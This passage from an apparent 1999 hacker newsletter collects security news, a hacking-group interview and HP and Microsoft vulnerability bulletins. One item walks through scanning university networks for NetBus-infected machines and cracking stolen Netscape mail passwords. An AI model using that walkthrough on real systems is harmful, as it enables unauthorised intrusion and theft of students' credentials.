be reached for comment. A member of a mailing list devoted to hacktivism said that the KKK.com site has fallen to crackers many times in the past. He said its lax security and high profile made the site an "easy target." But the source, who goes by the name Bronc Buster, said that the Internet Network Information Center, run by Network Solutions, is increasingly a target for domain bandits. "For someone like an activist, or a newbie hacktivist, with minimal high level skills, this becomes an easy way to take action," Bronc Buster wrote in an email. "Someone with good social engineering skills could, with some effort ... get their point across without any type of, what we think of today, as conventional hacking," Bronc Buster said. @HWA 44.0 MS ORDERS SECURITY AUDIT AFTER HOTMAIL BREACH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 10th September 1999 on 10:30 pm CET Microsoft revealed today that it is turning to an outside auditor to test the security of Hotmail after the recently discovered security/privacy flaw in the free email service. "We have voluntarily invited a third-party firm to conduct its own inquiry and present us with their findings". CNet article; http://news.cnet.com/news/0-1005-200-114899.html?tag=st.ne.1002.bgif?st.ne.fd.gif.l Microsoft orders security audit after Hotmail breach By Courtney Macavinta Staff Writer, CNET News.com September 9, 1999, 4:40 p.m. PT update Microsoft revealed today that it is turning to an outside auditor to test the security of its free email service, Hotmail, after a breach was discovered last week that threatened its users' privacy. Microsoft pulled Hotmail offline for about two hours August 30 after two European Web sites alerted the company that any Net user could access any Hotmail account without a password as long as a user's name, commonly found in a Hotmail email address, was known. According to security experts, the potential damage varied from allowing unauthorized parties to see a user's list of messages to allowing them to take complete control of an account. As first reported by CNET News.com, although Microsoft said it fixed the security problem the same day, it has decided to go a step further by testing the integrity of Hotmail, which has more than 40 million active members. "We have voluntarily invited a third-party firm to conduct its own inquiry and present us with their findings," Microsoft spokesman Tom Pilla told CNET News.com. Microsoft, in conjunction with Truste, had planned to disclose the news on Monday. Truste is a nonprofit group that acts as a privacy watchdog. "It's an ongoing process and we're working with Truste on that," Pilla said. "We definitely take privacy very seriously here, and the incident last week was regrettable, but we moved swiftly to resolve any issues." Microsoft wouldn't provide the name of the auditing firm, which will review Hotmail security but not the security of Microsoft's other Web sites that collect personal information from users. The move by Microsoft was apparently prompted by complaints made to Truste, which is expected to publish the so-called watchdog reports publicly. Microsoft is a premier sponsor of Truste and carries the program's licensed seal, which informs Web users about precautions a site is taking to protect their privacy. Late this afternoon Truste went ahead and posted an advisory on its Web site stating that Microsoft had agreed to its recommendation to hire a third-party firm to investigate and confirm that the Hotmail security hole had been fixed. "We are pleased with what Microsoft is doing, but we needed to assure those who had concerns that the process was underway to address this," David Steer, communications manager for Truste, said today. With issues like the Hotmail hole popping up more and more, Truste will start focusing on security issues, Bob Lewin, the organization's executive director, added in a statement. "The bottom line is that there is no trust without privacy and, likewise, there is no privacy without reasonable security of the data being collected," Lewin stated. Privacy seal programs have been touted by the online industry and the Clinton administration as one way to safeguard Net users' anonymity without government regulation. But consumer advocates want stricter laws put in place for the digital age, as Net users are constantly forfeiting valuable personal information in exchange for goods and customized Web content. The Truste seal usually applies to the use of personal information collected from surfers, but licensees also have to ensure that they will "help protect the security" of the information they store. Although free Web-based email services are one the Web's most popular tools, they have suffered from service problems in the past. This is not Truste's first investigation into Microsoft privacy practices. In March, Truste looked into a feature in Microsoft's Windows 98 operating system that could be exploited to collect information about authors of electronic documents without their knowledge through a unique identification number. But Truste concluded that Microsoft.com, which carries the seal, was in compliance with all Truste principles. The program did state, however, that "while the complaint itself does not pertain to the Web site, Truste believes that is important to note that the transfer of hardware IDs to the Microsoft secure server without customer consent did, in Truste's opinion, compromise consumer trust and privacy." @HWA 45.0 EMBASSY CRACKER MAY BE PLAYING GOVERNMENTS' GAME ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 10th September 1999 on 10:00 pm CET Top British computer security experts have warned that LevelSeven may be playing into the hands of the US government with their hack of the US embassy in China earlier this week. "Governmental organisations will have a really strong barrier somewhere and then a number of much less strong barriers in front of that. They will do this for two reasons. One is to see if people are targeting them and the other is to see exactly how they are doing it. Effectively they work as a trip wire." http://www.zdnet.co.uk/news/1999/36/ns-9880.html Embassy cracker may be playing government's game Fri, 10 Sep 1999 16:41:00 GMT Will Knight The response to crackers invading a US embassy site: It's just what the US wants. Top British computer security experts have warned that those responsible for cracking and defacing the US embassy Web site in China on Wednesday may be playing into the hands of the US government. The crackers have identified themselves as "The Level Seven Crew". The group claims not to have damaged the site's servers during the crack and says also that it repaired the security hole after posting details of the crack on the front page. Chad Davis, a founder member of cracking group Global Hell, which has been linked with The Level Seven Crew, was arrested in August by US authorities for breaking into the US army Web page. He has been accused of "maliciously" interfering with the army's communications system. British government security expert Ian Jonsten-Bryden, of Oceanus Security in Suffolk, believes the crackers could be doing exactly what the US government wants. "Governmental organisations will have a really strong barrier somewhere and then a number of much less strong barriers in front of that," he says. "They will do this for two reasons. One is to see if people are targeting them and the other is to see exactly how they are doing it. Effectively they work as a trip wire." Johnston-Bryden also believes that cracking a government agency is no stepping stone to more sensitive information. "Usually the really sensitive government stuff won't get anywhere near a public network. Also the encryption used to send information is not only very strong but is completely different from public encryption." Robert Schifreen, another security consultant and self-confessed ex-hacker, agrees that getting into a governmental Web site says little about real computer security. "It is tempting to advertise these sorts of things as major security breaches, but they are probably just the sort of standard cracks that could happen to anyone." "I would be inclined to think that normal hackers would not be able to break into something like the US embassy. The security measures they use are very, very different to those protecting a commercial Web server." @HWA 46.0 CYBER-CORPS TO PROTECT FEDERAL COMPUTERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 10th September 1999 on 3:00 pm CET The Clinton administration is planning a "cybercorps" to protect federal information systems. The Federal Cyber Service Initiative includes a special cadre of university students called the Cyber Corps, who would serve as federal computer warriors in exchange for computer-science scholarships. The initiative further calls for creating a Center for Information Technology excellence to train current federal workers to meet the new security challenges. And, the official said, "We're also looking at recruiting systems administrators right out of high school." http://web.lexis-nexis.com/more/cahners-chicago/11407/4981818/2 September 9, 1999, Thursday KR-ACC-NO: DA-CYBER-CORPS LENGTH: 1008 words HEADLINE: Clinton Administration Plans Cyber Corps to Protect Federal Computers BYLINE: By Jim Landers BODY: WASHINGTON--Uncle Sam wants computer-savvy college and high school students to fight the nation's information wars against hackers, terrorists and foreign agents. Daily cyber attacks on federal computers and a shortage of technology talent have led the Clinton administration to push recruitment as part of a broad computer defense plan to be released this month. The Federal Cyber Service Initiative includes a special cadre of university students called the Cyber Corps, who would serve as federal computer warriors in exchange for computer-science scholarships. The effort spotlights what experts say is a new and serious threat: a computer-wielding terrorist or foreign power bringing down the nation's electric power grid, air-traffic control network or other crucial systems. "The whole IT security threat has been a revolution. It has put a whole lot of pressure on federal agencies," said a White House national security official. The first class of 300 juniors, seniors and graduate students would be chosen next year, with another 600 in 2001, according to the official, who spoke on condition of anonymity. The initiative calls for creating a Center for Information Technology excellence to train current federal workers to meet the new security challenges. And, the official said,"We're also looking at recruiting systems administrators right out of high school." All of the military service branches are looking for information technology specialists, and are having trouble retaining those already in on the federal payroll. Private-sector employers are offering well-paid positions for computer security experts. Assistant Secretary of Defense Arthur Money told the Senate Armed Services Committee this summer the Pentagon needs to offer incentives"such as proficiency pay, retention bonuses, and education and training opportunities to maintain a pool of highly skilled workers." Administration officials say cyber attacks happen every day, and that exercises have shown widespread weaknesses in government systems. "Forget the individual hacker, the disgruntled insider. There are hostile nations developing, or who have developed, offensive cyber-attack capability aimed at the United States," said Jeffrey Hunker, the National Security Council's director of information protection. "We believe there may be some well-funded terrorist organizations that either have offensive cyber-attack capability or may easily develop it. The same is true of organized-crime elements," he said. Even before its formal unveiling, the computer defense plan is drawing criticism from some members of Congress and privacy advocates. Critics see the plan's Federal Intrusion Detection Network as an FBI license to snoop on Internet traffic and e-mail. White House and FBI officials insist the criticism is misplaced, describing the Fidnet merely as a way to alert officials about computer intrusions. It would cover only"a small number of very critical systems within the federal government," said another White House official who also spoke on the condition of anonymity. Federal officials are still in the dark about how many employees they need to mount an adequate cyber defense. The dearth of information kept the administration from asking Congress for funds to launch the program this year. The Office of Personnel Management is about halfway through a study of how many information technology specialists now work on computer security and how many the government needs to protect itself. The study is expected to be finished by the spring. The cyber defense plan itself is months behind schedule. For several weeks, it has been under review at the Justice Department. "We're trying ... to make the federal government's computer security a model for the rest of the nation," one White House official said."Right now the federal government is a model of what you don't want to be doing." Mr. Clinton first referred to the Cyber Corps in a January speech at the National Science Foundation about new types of national security threats. The president said he was asking Congress for $ 1.46 billion to protect critical infrastructure systems from computer and other types of attacks. Part of the money, he said, would go to"bolster the government's ranks of highly skilled computer experts." But since then, the planning has unfolded well out of the public eye. The Cyber Corps concept evolved into a scholarship program patterned after the Reserve Officer Training Corps, or ROTC, where the government provides scholarships to college students in exchange for military service after graduation. Cyber Corps students would work summer internships in high-security sites such as the Energy Department's nuclear weapons labs. The program is designed as a two-year scholarship, but could later be expanded to four years if it succeeds, one White House official said. Initial costs would be $ 50,000 to $ 60,000 per student. The government now relies on several different security agencies for protection from cyber attacks. After a virus crippled much of the operating networks of the fledgling Internet in 1988, the Defense Advanced Research Projects Agency created a cyber"SWAT team" at Carnegie-Mellon University in Pittsburgh. The Computer Emergency Response Team, or CERT, and includes about 20 computer security experts. It responded to fewer than 100 attacks in 1989, but faced nearly 2,500 attacks in 1998. About 80 other CERT teams have been created across the country. Each branch of the military also has its own team of specialists. One difficulty facing the federal cyber-training initiative is a dearth of strong computer security programs at U.S. universities, the second White House official said. "Right now there are only about 20 strong programs out there, or that will be in place within 12 months," the official said."There are not a lot of IT security majors or minors out there." ----- Visit The Dallas Morning News on the World Wide Web at http://www.dallasnews.com/ JOURNAL-CODE: DA @HWA 47.0 WINDOWS2000 BETA 3 BACKDOOR ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Friday 10th September 1999 on 2:30 pm CET David Litchfield of Arca Systems Inc. has discovered an serious flaw in the Win2k "autologin" feature which was incorporated in this release. On machines not connected to a domain affected versions of the Win2k installer automatically create an "autologin" account with administrative privileges and no password. If the Windows2000 Telnet server is active an attacker could find out the autologin account user name and log in with complete control over the computer. ZDNet. http://www.zdnet.com/zdnn/stories/news/0,4586,2331412,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- A real Windows back door By David Raikow, Sm@rt Reseller September 9, 1999 12:58 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2331412,00.html Amid all the spurious hype about the supposed "NSA Back Door" in Windows NT, a real and very dangerous security breach in some builds of Windows 2000 Beta 3 has gone almost unnoticed. In an e-mail circulated Monday, David Litchfield of security consultancy Arca Systems Inc. described a simple technique that would give an attacker full access to a susceptible machine. Microsoft (Nasdaq:MSFT) acknowledges it was aware of the breach within days of shipping Windows 2000 Beta 3 in April. The breach will be disabled in its Release Candidate 2 build, which Microsoft could release next week. While not the final release of Windows 2000, Beta 3 is the most widely circulated build, and one which Microsoft sold to interested testers and got certain OEMs to agree to preload on new systems. Microsoft claims that more than 650,000 testers are working with the build and the subsequent release candidates which Beta 3 testers receive. Autologin the culprit The Windows 2000 security problem stems from an "autologin" feature that Microsoft incorporated into the initial Beta 3 release. On machines not connected to a domain -- including the vast majority of home users -- affected versions of the Windows 2000 installer automatically create an "autologin" account based on the user's software registration information. This account has administrative privileges on the system and has no password. By itself, this feature presents little problem unless an attacker can get physical access to the machine in question. If the Telnet server built into Windows 2000 is active, however, an attacker could use a nbtstat command to find the autologin account user name, and log in with complete control over the computer. Even worse, the Telnet server can be covertly activated by a simple Visual Basic script hidden in any HTML document. Scott Culp, Microsoft security manager for NT, acknowledged that the autologin feature had presented a threat, but said that it had been removed in recent builds. He was unable to provide the precise build number in which autologin was removed. "This was an option intended to allow users with good physical access to their hardware a simplified login process, but our security team quickly recognized the problems involved and insisted on its removal," said Culp. '... Not ready to ship' "It's important to remember that this is a beta product, and not ready to ship. Finding these kinds of problems is what the beta process is all about." Culp also acknowledged that a remote user could start the Windows 2000 Telnet server. While this bug in itself has serious security implications, he insisted that the removal of the autologin feature had rendered it useless to an attacker. "The attack requires an account with a known name and password, but ... we've already implemented changes that prevent that," he said. The "autologin" feature was implemented in Microsoft Windows Beta 3, and will not exist in the forthcoming Release Candidate 2. According to Microsoft, the feature was altered to prompt users for a password in Release Candidate 1, which they released to testers in July. Additional reporting by Will Knight, ZDNet UK, and Mary Jo Foley, Sm@rt Reseller. @HWA 48.0 AMERICAN EXPRESS AND E-COMMERCE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Friday 10th September 1999 on 3:43 am CET American Express works on secure transactions in e-commerce. New credit card with added security features for e-commerce will offer several levels of protection. American Express Online Wallet will help peoplee to feel secure and be secured. "Digital wallets are definitely a good move, both for the consumer and the retailer" said Nick Jones, analyst for Jupiter Communications. http://www.zdnet.co.uk/news/1999/35/ns-9838.html Amex card targets online security fears Thu, 09 Sep 1999 15:49:04 GMT Justin Pearse American Express has launched a credit card with added security features for e-commerce. The first feature aimed at allaying the fears of shoppers entering into online transactions is the American Express Online Wallet. Members enter purchase information, such as card details and home address. When making an online purchase the user opens the wallet, clicks on a "complete purchase" button and the vendor's form is automatically filled in. For the really paranoid American Express is also offering a second level of protection, in the form of a smart card reader. Built into the Blue card is a chip that can be read by a smart card reader, provided free, attached to the user's PC. The embedded chip holds a unique digital certificate that acts to unlock the Online Wallet once the user has swiped his card through the reader and entered their PIN number. The card has been launched in the US only at present. A spokesperson for American Express said, "In the US we kept hearing that one of the main barriers to taking up online shopping for those new to the Internet was security worries, and so this seemed like the perfect time to introduce a product to try and reassure our customers." She could not confirm plans for an UK launch, saying, "We'll have to see how it does here first." Nick Jones, analyst for Jupiter Communications, is impressed by the security measures offered by the card. "Digital wallets are definitely a good move, both for the consumer and the retailer," he said. "Offering the card reader is smart, it gives consumers an extra hand to hold onto. Although the process of having to attach an extra device to your PC may give them another thing to be worried about." @HWA 49.0 BUSINESS TOO TRUSTING OF E-MAIL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Thursday 9th September 1999 on 1:30 pm CET According to Neil Barrett, technical director for information security consultancy IRM, poor e-mail security is leaving around two thirds of companies vulnerable. Citing independent research from the Cyberliability Group, he says businesses are far too trusting with e-mail. "This trust makes it an extremely soft target for hackers and a major security weakness," according to Barrett. http://www.32bitsonline.com/news.php3?news=news/199909/nb199909089&page=1 Business Too Trusting Of E-mail, Warns Security Consultancy By: Sylvia Dennis Date: 09/08/99 Location: LONDON, ENGLAND Poor e-mail security is putting computer networks at risk, according to Dr. Neil Barrett, technical director for Information Risk Management (IRM), the independent information security consultancy. Barrett cites independent research from the Cyberliability Group as suggesting that around two thirds of large UK companies are vulnerable. "Although the recent Microsoft Hotmail incident has generated a lot of publicity, it's only one small incident. The big problem is that business is far too trusting of e-mail," he said. "This trust makes it an extremely soft target for hackers and a major security weakness," he told Newsbytes. "In system tests, IRM has used falsified e-mails to trick firms into installing Trojan programs such as Back Orifice, providing open access to their computer systems," he added. According to Barrett, recent research from the Cyberliability Group has revealed that 54 percent of large UK firms have no formal policy for controlling the use of external e-mail, while 19 percent of firms with a policy do not check for compliance. Sir Simon Hornby, IRM's chairman, meanwhile, said that the management of risk is key to all future developments in the transfer of information, e-commerce, and on-line services. Hornby said that IRM was set up because, in today's interconnected business environment, security has become the dominant factor not only in the development of business and the growth of e-commerce, but also in the exercise of due diligence. @HWA 50.0 SCOTTISH HACKERS DECLARE WAR ON WALES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Thursday 9th September 1999 on 2:50 am CET A group calling itself the Hardcore Highland Haxxors (HHH) has defaced the Scottish Executive Web site and renamed it the Scottish H4xecutive. The new "civil servants" charged with advising Scottish politicians and enforcing their policy have also accused the "Whelsh" Office (sic) of rustling sheep. In retaliation, the HHH has declared that Scotland is now at war with Wales. This happened after an initial warning by DNScon that the site was vulnerable as we reported last week. http://www.theregister.co.uk/990908-000005.html Posted 08/09/99 3:33pm by Tim Richardson Scottish Crackers declare war on Wales It appears Braveheart hackers have carried out their threat to trash a Scottish government Web site after warning First Minister Donald Dewar that it was vulnerable to attack from cyber terrorists. A group calling itself the Hardcore Highland Haxxors (HHH) has defecated all over the Scottish Executive Web site and renamed it the Scottish H4xecutive. The new "civil servants" charged with advising Scottish politicians and enforcing their policy have also accused the "Whelsh" Office (sic) of rustling sheep. In retaliation, the HHH has declared that Scotland is now at war with Wales. "The Scottish H4xecutive has estimated that over 5000 sheep have been russled by agents of the Whelsh office in the last six months. It is of our opinion that these sheep that were destined for the butchers of Carslile will soon end up on the streets of Cardiff. "In force IMMEDIATELY is a state of WAR between us to put right the theft of our oh-so precious sheep." It's just a pity they aren't as concerned about their ability to spell as they are about their sheep, but there you go. A spokesman for the Scottish Executive said that although the incident was embarrassing there was "no threat to internal security". "Our internal system is quite separate from the information on our Web site," he said adding that all was being done to resolve the problem. The Scottish Executive Web site is hosted by Scotland Online, a subsidiary of Scottish Telecom. No one from the Web company or telco was available for comment at press time. ® @HWA 51.0 V-ONE AND RED HAT IN SECURITY PACT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Wednesday 8th September 1999 on 6:30 pm CET The NY Times has a story on a "security pact" between V-One Corp and Red Hat Inc in the form of V-One's Linux-based Instant Extranet Server, which allows companies to use the Internet securely to share information with suppliers and customers using private networks running Internet-based software. "IXS combines V-One's network security software with Linux software from market leader Red Hat." http://www.nytimes.com/library/tech/99/09/biztech/articles/08red-hat.html V-One and Red Hat in Security Pact By REUTERS NEW YORK -- Shares of Internet security software maker V-One Corp. and Red Hat Inc. surged Tuesday after V-One unveiled Linux-based software that allows companies to form secure links with their trading partners. Shares of Germantown, Md.-based V-One soared 104 percent, or $2-3/8, to $4-5/8 a share, after reaching a 52-week high earlier in the day of $5-1/4. Red Hat shares rose $8-7/8 to $93-9/16. Both trade on the Nasdaq stock market. The software, called Instant Extranet Server (IXS), allows companies to use the Internet securely to share information with suppliers and customers using private networks running Internet-based software. IXS combines V-One's network security software with Linux software from market leader Red Hat. Linux is a low cost alternative operating system to Microsoft Corp.'s Windows that is developed by an open community of software programmers. V-One said the IXS system, which can be installed in under 30 minutes, would sell for $995, giving small businesses access to Internet security that has previously been available only to larger organizations paying far higher prices. @HWA 52.0 HACKERS DEFACE HACKER'S SITE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Wednesday 8th September 1999 on 5:12 pm CET www.redattack.dyns.cx, web site of hacker called RedAttack (that Belgian hacker who liked the media). "You just created hoaxes and the belgian hackers community didn't like that - where is your credibility now? The media will be notified". BTW in Default #4 you could read an interview with Belgian hacking group CUM, which also talks about RedAttack. -=- REDATTACK HAS BEEN ATTACKED BY THE REDATTACK ATTACK SQUAD Fuck off you stupid RedAttack - you have been hacked by RAAS You just created hoaxes and the belgian hackers community didn't like that - where is your credibility now? The media will be notified Don't you feel BLUE now? This was the page of an MS-certified hacker. BTW: did you discover USENET yet ? -=- The Interview from Default #4; Special about Beglian Hacker Szene / Bust of RedAtack. Intervied CUM ( Crew Madness Underground ) I had a little interview with toxic from CUM, Belgiums best h/p/v/c/a group. Check his statements about The RedAttack bust and about the Belgian hacker scene. <--begin interview-- deepcase: ok, tell something about the belgium scene ! toxic : There isn't much to tell about that.. we used to have a quite "close" scene in the BBS era.. but that's now gone with the Internet... You don't have much belgian groups anymore... with the internet it's like more the individual that counts i guess..., still there are some very good belgian guyz like m0n from cha0s, d0mz, segfau|t, n3m0, socked, deepcase, g_rax ... deepcase: something about CUM, what yu do, why, since when etc. CUM was founded in 1996, this when Hacker, Immortal Intruder, Fiber Optic and I (Toxic Ocean) met IRL for the first time... in that time Hacker was running a multi-node warez board ("Unusual Project"), Immortal and Fiber had one of the biggest h/p/a/v/c board in Belgium ("Hacker Town")... and i was a frequent caller of both boards.. We shared some common interests like hacking, computer security - and just plain computer phun :) .. so we decided to start our own group, in the beginning just to share ideas and files, and later to test new technologies, security, gather knowledge... we really aren't a "defacing" group, as we think that's rather lame... when we hack a server, we keep the access to learn and explore.. not to deface the page and have our moment of fame... but since these times you need to deface a page to be taken "serious" , we now and then deface a page .. but then mostly stupid servers with nothing on it .. lately we also begun to explore more "hardware" stuff - this is why we founded the CUM-tech-lab, our own lab with all kindsa computers to "test things out".. we also begun exploring the phone system, and GSM nets... right now we're writing a "Belgian Phreak/Phonephun Guide" for all belgian (and other) h/p/a/v/c'ers , with in it up-to-date info, technical details and usefull tricks. deepcase: what you think about RedAttack man toxic : He's a wannabe. A kiddie who thinks he's the best hacker on earth. With this we can live, you just ignore guys like that. But what's really scary is that a lot of people buy his shit. In an interview with a belgian magazine, he was so full of shit, it made me sick. Example : he claimed he had hacked the largest bank of Belgium ("Generale Bank"). He said it took him AND a team 3 weeks and a hell of a lot maths to get the job done. Reality : the password of the helpdesk was "hlpdsk". Need I say more. The only thing he got was a few internetbanking usernames, no passwords. Big deal. He went to the media with this. Ofcourse they believed he had hacked into the core of the banks mainframe, you know the media. The whole thing is blown out of proportion. He's also claiming that there aren't other hackers in Belgium and shit like that. But just a few days ago, his own website got hacked ;) deepcase: whats yur comment on his bust toxic : His early bust proves he's not really that good, it took us just 1 e-mail to get his name and real IP address, so... But now he wants everybody to believe he's a crusader on a mission. A mission of cleaning the internet. He wants to ban all "harmfull" content from the net, stuff like "how to make a pipebomb". What happened to free speech?? Not to mention that you can also find all these things in ur local library... This explanation is crap, he's only telling this because he doesn't wanna go to jail and wants to have a "clean" image... He's a media wh0re, a kiddie who wants his 5 minutes of fame... Even worse, because of him the politicians are now making laws against "computer criminals". Before redattacks media exposion, there were no such laws here in Belgium... deepcase: you knew him? toxic : Nope, never heard of him before he was on tv... <--end interview-- deepcase deepcase@net-security.org @HWA 53.0 How to penetrate Universities in less than an hour ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://securityportal.com/direct.cgi?/topnews/tn19990902.html By Michael Stark September 2, 1999 - All I hear in the news nowadays is hackers breaking into Hi-Level systems all over the net, but what I don't hear is hackers getting caught on a regular basis. One of main points of consideration when targeting a Hi-Tech/Hi-Security system is the point of not getting caught. Hacker bounces range from pre hacked ISP's to anonymous shell accounts, the main problems with using these sources are that they are very slow and not very useful for the on the fly hacker. A trend that is growing rapidly is university computers being used as main focus points for the hacking community. Armed with a readily available scanner you can take over a university computer in under an hour. Since the release of NetBus and BackOrifice, infections at the university level have grown tremendously and will continue to grow unless the issue is taken seriously. By simply searching for the NetBus in http://astalavista.box.sk you too can be armed with a dangerous tool. After you acquire your own personal copy of NetBus, fire it up and take a look at all the things that you could do to an unsuspecting target. By using the scan feature you can effectively find as many targets as you wish. The next step in gathering your targets is to determine the range that will be used. An easy way to acquire this information is simply resolve the IP of your favorite university then using a tool called SAM SPADE (http://www.blighty.com/products/spade/) you can begin the process; this tool will get the necessary information for the scan. The part you want to concentrate on is the IPBLOCK of the university. After acquiring the IPBLOCK of the university of choice, simply plug the range into NetBus and begin the scan. After a short while your targets will start pouring in. All that's left is to connect to the given computers and start the hack. Once connected, the real fun starts. Almost everyone uses E-mail online, so based on that fact the best place to start to look for passwords is the mailing agents. Currently universities allow their students shell access to check their E-mail, but most students are more comfortable using Netscape or Eudora etc. Once you are connected you have a choice of browsing the user's drive, this is done through "File Manager". Clicking "Show Files" will gather the file directory structure of the target computer. The display is easy to navigate and is shown in classic tree format. Once you receive the list, you have some options. You could navigate to "Programs Files\Netscape\users\target\" and download the "Prefs.js" file, or you could hope that the target is using Eudora and find the "Eudora.ini" file. Keep in mind that there are many other ways to use NetBus and there are many other mailing agents, personally I will stick with Netscape for the reason that most people have it and it is widely used in universities. If you have successfully acquired the "Prefs.js" file you ready to go. The next step is to download a cracker for the file, I recommend "K^KakO^B's CracPack 1.80" which can be found at http://www.hackers.com/files/cprogs/cracpk18.zip. After downloading it, choose the "Nmailcrk.exe" with the Netscape Icon. This tool will decrypt the Netscape password and give you the final piece to the puzzle. Armed with the username and password of the target, plus the address of the E-mail server, you can now penetrate without brute force methods. The fruit of your labors are two fold, on one hand you now have a shell account to access and exploit as you see fit, and on the other hand you now the main concentration of infected hosts in which you can scan and bounce off of in the future. Pretty scary huh? One Solution: No university can be expected to check every single computer on campus, or can they? Let's say that you have two domains that are completely full, meaning 254 computers each. Now lets say that on each domain there was a port scanning computer that would randomly scan its domain for open ports, then query to see if the NetBus or any other Trojan responded. Setting up such a system would not take much time or effort and the results are better than letting a student jeopardize the university's security. I personally have set up a custom system like this one and it did wonders for the university. Now people will say that a good virus scanner will do the trick, but ask yourself: in the past months have those virus scanners been able to keep up with all the new hacker methodology for hiding Trojans? The bottom line is that large scale LANs, WANs and MANs are more prone to random downloads of Trojans, and the risk of wide spread infection. In my opinion Trojans are a copout to real penetration, but despite that they are turning into the most wide spread technique used by novice and expert alike. Michael Stark is a international penetration expert and security analyst, and has advised the US Federal Government on network intrusion techniques and countermeasures. @HWA 54.0 Biometrics, busting hackers by sense of smell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Biometrics Makes Scents For Computer Users (09/01/99, 9:53 a.m. ET) By Mo Krochmal, TechWeb NEW YORK -- The day may come when a computer can identify its user by body odor, said a biometric security consultant Tuesday. Biometrics is a technology that takes digital measurements of biological characteristics such as fingerprints or voices and compares them with a version stored in software to verify a person's identity. These tools are becoming more popular as a form of identification as the technology needed becomes increasingly sophisticated and less expensive. Already, vendors are selling fingerprint recognition technology on computer keyboards or iris recognition for automated teller machine manufacturers. U.K. company Mastiff Electronic Systems is said to be in development of Scentinel, a product that digitally sniffs the back of a computer user's hand to verify identity, said William Rogers, a biometrics consultant, at the International Security Conference and Exposition held here in New York on Tuesday. These prospective odor sniffers are the most exotic technology in a list that includes face and fingerprint readers, iris and retinal scans, finger and hand geometry, and signature and voice recognition. "There are 50 applications in seven markets," said Michael Kuperstein, the CEO of Miros, a Wellesley, Mass., company that produces a product that measures the geometry of the face for biometric identification. There are biometric measurements that should be logically applied in certain markets, he said. Law enforcement will use fingerprints, while voice recognition for telephone, and face recognition with video, are natural choices in those markets, he said. The use of the technology is expanding into voter registration, identification of students for testing, health care, and even, Rogers said, for entry into Disney theme parks. Some industries are starting to use several biometric technologies, layering one on top of another. But hand sniffing? "Don't hold your breath," said Samir Nanaviti, a partner in International Biometric Group, a New York-based consultancy. @HWA 55.0 HP Security Bulletin: Vulnerability in rpc.cmsd ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ------------------------------------------------------------------------ HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00102, 30 Aug 1999 ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: Buffer overflow vulnerability in the CDE Calendar Manager Service Daemon, rpc.cmsd. PLATFORM: HP-9000 Series 700/800 HP-UX releases 10.20, 10.30, 11.00. DAMAGE: Allows remote and local users to execute arbitrary code with root privileges. SOLUTION: Install the applicable patch. AVAILABILITY: The patches are available now. ------------------------------------------------------------------------- I. A. Background This problem has been reported in CERT Advisory CA-99-08. B. Fixing the problem - Install the applicable patch: For HP-UX release 10.20 PHSS_19482; For HP-UX release 11.00 PHSS_19483. There are significant patch dependencies for both patches. Note: HP-UX release 10.30 was a development release prior to the availability of HP-UX release 11.00. HP-UX release 10.30 will not be patched. C. To subscribe to automatically receive future NEW HP Security Bulletins from the HP Electronic Support Center via electronic mail, do the following: Use your browser to get to the HP Electronic Support Center page at: http://us-support.external.hp.com (for US, Canada, Asia-Pacific, & Latin-America) http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID assigned to you, and your password. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review- bulletins already released from the main Menu, click on the "Search Technical Knowledge Database." Near the bottom of the next page, click on "Browse the HP Security Bulletin Archive". Once in the archive there is another link to our current Security Patch Matrix. Updated daily, this matrix categorizes security patches by platform/OS release, and by bulletin topic. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. ________________________________________________________________________ @hwa 56.0 Microsoft Bulletin: "Fragmented IGMP Packet" Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ************************************** Microsoft Security Bulletin (MS99-034) -------------------------------------- Patch Available for "Fragmented IGMP Packet" Vulnerability Originally Posted: September 03, 1999 Summary ====== Microsoft has released a patch that eliminates a vulnerability in the TCP/IP stack implementations of Microsoft® Windows® 95, Windows 98 and Windows NT® 4.0. Fragmented IGMP packets can cause a variety of problems in Windows 95 and 98, up to and including causing the machine to crash. Windows NT 4.0 contains the same vulnerability, but other system mechanisms make a successful attack much more difficult. 